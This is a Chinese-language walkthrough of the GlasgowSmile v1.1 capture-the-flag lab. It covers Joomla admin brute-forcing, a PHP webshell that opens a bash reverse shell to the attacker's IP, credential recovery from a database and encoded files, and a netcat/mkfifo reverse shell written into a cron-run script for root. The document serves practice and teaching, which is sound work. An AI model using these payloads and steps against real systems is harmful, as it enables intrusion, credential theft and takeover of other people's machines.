GlasgowSmile-v1.1靶机练习
前言
起因是每日正常打靶,平常写的靶机笔记都会发到CSDN上,但是这个靶机真是给我打破防了!joker的微笑靶机,打完之后会发现我成小丑了,开了七个终端都不够用的靶机,看下面目录中登录的用户就知道了,今日靶机破防发文望周知。。
我写的比较详细,一些陌生命令和工具都做了详解,如果能坚持看下来可以学到很多,另外如果大家喜欢这篇靶机文章我后面会把一些靶机存货发到公众号上搞一个合集。
“小丑的微笑”靶机地址在文末获取
一、主机发现加信息收集
靶机IP
虚拟机启动就会得到IP:192.168.25.162
export ip=192.168.25.162
端口扫描
nmap --min-rate 10000 -p- $ip
22,80端口
服务信息扫描
nmap -sT -sV -O -p22,80 $ip
结果
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open http Apache httpd 2.4.38 ((Debian))
MAC Address: 00:0C:29:75:54:5A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
脚本扫描
nmap --script=vuln -p22,80 $ip
结果,信息没有太大利用价值
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:75:54:5A (VMware)
二、渗透开始
(一)80端口Web端
访问,迎面而来是一张静态的图片,非常的CTF
这里也有他的一些指纹
那就目录爆破一下
gobuster dir -u http://192.168.25.162/ -w /usr/share/dirbuster/wordlists/medium.txt
gobuster的话只出了一个目录
http://192.168.25.162/joomla/
这里再用dirb爆破一下
dirb http://192.168.25.162/
此目录下又有很多文件
---- Entering directory: http://192.168.25.162/joomla/ ----
==> DIRECTORY: http://192.168.25.162/joomla/administrator/
+ http://192.168.25.162/joomla/index.php (CODE:200|SIZE:10013)
+ http://192.168.25.162/joomla/robots.txt (CODE:200|SIZE:836)
http://192.168.25.162/joomla/administrator/
一个后台,用的Joomla! CMS框架
http://192.168.25.162/joomla/index.php
主页
http://192.168.25.162/joomla/robots.txt
这里是有给到我们信息的
❝
-- If the Joomla site is installed within a folder
-- eg www.example.com/joomla/ then the robots.txt file
-- MUST be moved to the site root
-- eg www.example.com/robots.txt
-- AND the joomla folder name MUST be prefixed to all of the paths.
-- eg the Disallow rule for the /administrator/ folder MUST
-- be changed to read
Disallow: /joomla/administrator/
For more information about the robots.txt standard, see:
http://www.robotstxt.org/orig.html
For syntax checking, see:
http://tool.motoricerca.info/robots-checker.phtml
User-agent: * Disallow: /administrator/ Disallow: /bin/ Disallow: /cache/ Disallow: /cli/ Disallow: /components/ Disallow: /includes/ Disallow: /installation/ Disallow: /language/ Disallow: /layouts/ Disallow: /libraries/ Disallow: /logs/ Disallow: /modules/ Disallow: /plugins/ Disallow: /tmp/
信息中的administrator文件是被禁止的但是我们找到了,所以这个文件肯定是很重要的一部分
搜索一下这个CMS框架 Joomla
这里成功找到一个Joomla的RCE漏洞,我们只能进行尝试因为我们并不知道其具体版本
将EXP下载,并且执行
查看下帮助
我们先用-c 参数检查一下,发现不存在漏洞我们就换一个EXP
但其实我们还是需要先确定组件的版本,网上的信息都是登录到后台查看
但是我们查到在XML文件中也有其版本信息
路径:/joomla/administrator/manifests/files/joomla.xml
我们发现可以查看
也是成功拿到版本3.7.3
我们再去searchsploit去搜索
searchsploit Joomla 3.7.3
只有一个CS跨站脚本,对边界突破没啥用
那我们去试试爆破密码吧,没啥办法了也
cewl http://192.168.25.162/joomla -w pss.txt
-
cewl
是一个用于爬取网站并生成自定义字典的工具。它可以从指定的网站中提取单词,通常用于密码破解或安全测试中的密码猜测等场景。 -
-w pss.txt
是一个输出选项。-w
表示将提取到的单词写入文件,pss.txt
是存储这些单词的文件名。
用户名就是我们猜测的:jokker joomla admin这三个
密码也爬出来了
you
Joker
the
Home
laughing
Email
your
that
what
funny
and
Arthur
Begin
Content
End
Right
Sidebar
Username
Password
Forgot
You
Isn
decide
right
was
chuckling
Cop
Psychiatrist
just
thinking
Glasgow
Smile
Print
username
password
Body
Header
User
Uncategorised
are
here
Main
Menu
Login
Form
Remember
Log
Footer
Back
Top
Details
Written
Super
Category
Published
June
Hits
Comedy
subjective
Murray
they
say
All
system
knows
much
wrong
The
same
way
not
Why
everybody
upset
about
these
guys
dying
sidewalk
walk
over
pass
every
day
don
notice
police
car
chaos
being
spread
Gotham
City
Stop
freak
This
isn
Yeah
whole
fucking
city
fire
because
know
beautiful
loudly
during
psychiatric
examination
Arkham
Asylum
soon
settles
down
but
still
laughs
What
some
more
joke
wanna
tell
softly
whispers
wouldn
get
this
link
friend
Address
article
email
address
account
will
Close
Window
Your
Please
enter
Submit
for
verification
code
Sender
Subject
Send
Cancel
end
items
leading
RSS
Atom
associated
with
emailed
file
sent
Once
have
received
able
choose
new
我们先爆破一下后台,后台最重要了
字典不多直接集束炸弹bomb模式开轰
搞出来几个我们看看吧
admin isn
joomla Gotham 这两个
joomla Gotham 成功登入
直接搜joomla 后台拿shell
这里我们是第二种
后台操作 Global Configuration
- ->media
–>Legal Extensions (File Types)
添加php后缀,媒体上传即可
save保存,回到首页点击Media
我们上传还是什么都没有,不知道什么情况
那我们就换第三种
随便一个就行
上传我们的php马
不让上传我们就创建
输入反弹shell代码
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.25.132/4444 0>&1'");?>
HackTricks: https://book.hacktricks.xyz/可以到这个网站去找反弹shell代码
save保存
Kali开启监听
nc -nvlp 4444
然后访问
http://192.168.25.162/joomla/templates/protostar/shell.php
三、获取初始权限
反弹shell成功
四、提权
交互shell
❝
python -c 'import pty; pty.spawn("/bin/bash")'
whoami && id && hostname && ip addr
uname -a
ls -liah
cat /etc/passwd | grep -v "nologin"
cat /etc/*-release 查看当前系统的发行版名称和版本号
cd ~
ls -liah
发现有一个how_to.txt文件,有一个rob 可能作为一个用户
cd joomla2
cat configuration.php
发现了mysql的用户密码
joomla babyjoker
MYSQL登录
我们登录一下这个mysql数据库
mysql -u joomla -p
成功登入
先看库
show databases;
我们看batjoke就行,其他库不太重要但这个库一眼明显
use batjoke;
show tables;
select * from equipment;
select * from taskforce;
成功找到用户和密码
+----+---------+------------+---------+----------------------------------------------+
| id | type | date | name | pswd |
+----+---------+------------+---------+----------------------------------------------+
| 1 | Soldier | 2020-06-14 | Bane | YmFuZWlzaGVyZQ== |
| 2 | Soldier | 2020-06-14 | Aaron | YWFyb25pc2hlcmU= |
| 3 | Soldier | 2020-06-14 | Carnage | Y2FybmFnZWlzaGVyZQ== |
| 4 | Soldier | 2020-06-14 | buster | YnVzdGVyaXNoZXJlZmY= |
| 6 | Soldier | 2020-06-14 | rob | Pz8/QWxsSUhhdmVBcmVOZWdhdGl2ZVRob3VnaHRzPz8/ |
| 7 | Soldier | 2020-06-14 | aunt | YXVudGlzIHRoZSBmdWNrIGhlcmU= |
+----+---------+------------+---------+----------------------------------------------+
正好有我们需要的rob用户,我们去破解一下密码,看着像是Base64
???AllIHaveAreNegativeThoughts???
Rob用户登录
这里我们用ssh也是成功登入了rob用户
首先肯定是使用sudo -l 看看权限
好好好没有sudo
那看先我们这个用户可以使用什么命令吧
find / -perm -4000 -print 2>/dev/null
再看看有啥可写入的root文件
find / -type f -user root -perm -o=w ! -path "/proc/*" 2>/dev/null
没啥用
回到我们的用户目录看看文件
cd ~
ls -liah
我们发现一个user.txt 文件 和 一个Abnerineedyourhelp
rob@glasgowsmile:~$ cat user.txt
JKR[f5bb11acbb957915e421d62e7253d27a]
rob@glasgowsmile:~$ cat Abnerineedyourhelp
Gdkkn Cdzq, Zqsgtq rteedqr eqnl rdudqd ldmszk hkkmdrr ats vd rdd khsskd rxlozsgx enq ghr bnmchshnm. Sghr qdkzsdr sn ghr eddkhmf zants adhmf hfmnqdc. Xnt bzm ehmc zm dmsqx hm ghr intqmzk qdzcr, "Sgd vnqrs ozqs ne gzuhmf z ldmszk hkkmdrr hr odnokd dwodbs xnt sn adgzud zr he xnt cnm's."
Mnv H mddc xntq gdko Zamdq, trd sghr ozrrvnqc, xnt vhkk ehmc sgd qhfgs vzx sn rnkud sgd dmhflz. RSLyzF9vYSj5aWjvYFUgcFfvLCAsXVskbyP0aV9xYSgiYV50byZvcFggaiAsdSArzVYkLZ==
得被加密了,不是解码
一看这就是被打乱了
又不是单纯的字符直接的转换,那就猜测是ASCII码的偏移量,那就用凯撒解一下,搜pass,确实被加密了
Hello Dear, Arthur suffers from severe mental illness but we see little sympathy for his condition. This relates to his feeling about being ignored. You can find an entry in his journal reads, "The worst part of having a mental illness is people expect you to behave as if you don't."
Now I need your help Abner, use this password, you will find the right way to solve the enigma. STMzaG9wZTk5bXkwZGVhdGgwMDBtYWtlczQ0bW9yZThjZW50czAwdGhhbjBteTBsaWZlMA==
拿到解成功的密码去解码
I33hope99my0death000makes44more8cents00than0my0life0
abner用户登录
ssh [email protected]
寄!还是没有sudo,感觉还有一层
和刚才一样的流程,啥也没,接着看用户目录
cd ~
ls -liah
这里有user2.txt
abner@glasgowsmile:~$ cat user2.txt
JKR{0286c47edc9bfdaf643f5976a8cfbd8d}
还有个info.txt
A Glasgow smile is a wound caused by making a cut from the corners of a victim's mouth up to the ears, leaving a scar in the shape of a smile.
The act is usually performed with a utility knife or a piece of broken glass, leaving a scar which causes the victim to appear to be smiling broadly.
The practice is said to have originated in Glasgow, Scotland in the 1920s and 30s. The attack became popular with English street gangs (especially among the Chelsea Headhunters, a London-based hooligan firm, among whom it is known as a "Chelsea grin" or "Chelsea smile").
第一个
f5bb11acbb957915e421d62e7253d27a
第二个
0286c47edc9bfdaf643f5976a8cfbd8d
hash-identifier 0286c47edc9bfdaf643f5976a8cfbd8d
判断为MD5格式再去解码
-
MD5解密在线网站 md5破解网站:
pmd5.com
ttmd5.com
www.somd5.com
xmd5.com
https://hashes.com/zh/decrypt/hash (收藏收藏)
寄!都不行
cat .bash_history
解压了一个东西
我们找一下这个解压文件
find / -name .dear_penguins.zip 2>/dev/null
/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
unzip /var/www/joomla2/administrator/manifests/files/.dear_penguins.zip
还**要密码
[/var/www/joomla2/administrator/manifests/files/.dear_penguins.zip] dear_penguins password:
I33hope99my0death000makes44more8cents00than0my0life0
给他密码
abner@glasgowsmile:~$ cat dear_penguins
My dear penguins, we stand on a great threshold! It's okay to be scared; many of you won't be coming back. Thanks to Batman, the time has come to punish all of God's children! First, second, third and fourth-born! Why be biased?! Male and female! Hell, the sexes are equal, with their erogenous zones BLOWN SKY-HIGH!!! FORWAAAAAAAAAAAAAARD MARCH!!! THE LIBERATION OF GOTHAM HAS BEGUN!!!!!
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
scf4W7q4B4caTMRhSFYmktMsn87F35UkmKttM5Bz
解码啥都没有,感觉没加密
登录penguin试试
penguin用户登录
ssh [email protected]
还是没sudo
根据经验看目录
看user3文件
penguin@glasgowsmile:~/SomeoneWhoHidesBehindAMask$ cat user3.txt
JKR{284a3753ec11a592ee34098b8cb43d52}
再看PeopleAreStartingToNotice.txt文件
Hey Penguin,
I'm writing software, I can't make it work because of a permissions issue. It only runs with root permissions. When it's complete I'll copy it to this folder.
Joker
正在编写且有一个文件只能root权限运行,那就是这个find 了,很明显是有计划任务了
655370 -rwSr----- 1 penguin penguin 309K Jun 15 2020 find
这里我们使用pspy监控一下
https://github.com/DominicBreuker/pspy.git
下载
Kali中开下服务器
python -m http.server 80
到靶机中下载下来
wget http://192.168.25.132:80/pspy64
成功下载后给它一个执行权限
chmod +x pspy64
./pspy64 -h
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Usage:
pspy [flags]
Flags:
-c, --color color the printed events (default true)
--debug print detailed error messages
-d, --dirs stringArray watch these dirs
-f, --fsevents print file system events to stdout
-h, --helphelpfor pspy
-i, --interval int scan every 'interval' milliseconds for new processes (default 100)
--ppid record process ppids
-p, --procevents print new processes to stdout (default true)
-r, --recursive_dirs stringArray watch these dirs recursively (default [/usr,/tmp,/etc,/home,/var,/opt])
-t, --truncate int truncate process cmds longer than this (default 2048)
我们直接开启监听
./pspy64 -p -i 1000
监听到文件/home/penguin/SomeoneWhoHidesBehindAMask/.trash_old每分钟都执行
那我们就编辑直接写入就OK了
vi .trash_old
写入shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.132 4555>/tmp/f
-
rm /tmp/f
:首先,它会尝试删除/tmp
目录下名为f
的文件。这一步是为了确保/tmp/f
文件不存在,以避免后续操作的干扰。 -
mkfifo /tmp/f
:使用mkfifo
命令创建一个名为/tmp/f
的命名管道。命名管道是一种特殊类型的文件,允许进程之间进行通信,类似于普通管道,但具有持久化的特点。 -
cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.132 4555>/tmp/f
:这是一个管道组合,包含以下几个部分:-
cat /tmp/f
:从/tmp/f
命名管道中读取数据。 -
/bin/sh -i
:启动一个交互式的 shell。 -
2>&1
:将标准错误重定向到标准输出,这样错误信息也可以通过管道发送出去。 -
nc 192.168.25.132 4555
:使用nc
(netcat)工具尝试连接到 IP 地址为192.168.25.132
端口为4555
的远程主机。 -
>/tmp/f
:将nc
接收到的远程输入重定向到/tmp/f
命名管道,形成一个循环,使得远程输入可以被cat
读取并传递给/bin/sh -i
,同时/bin/sh -i
的输出又可以通过nc
发送到远程主机。
-
ssh用vi不太好用我们这里直接删掉然后重写
echo > .trash_old
#/bin/sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.25.132 4555>/tmp/f
vi
i
粘贴
Esc
:wq
等待连接
Root登录成功提权
靶机获取
靶机在这里!!
原文始发于微信公众号(泷羽Sec-Blanks):GlasgowSmile-v1.1--靶机练习(实在被打破防,故发文,望周知!)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论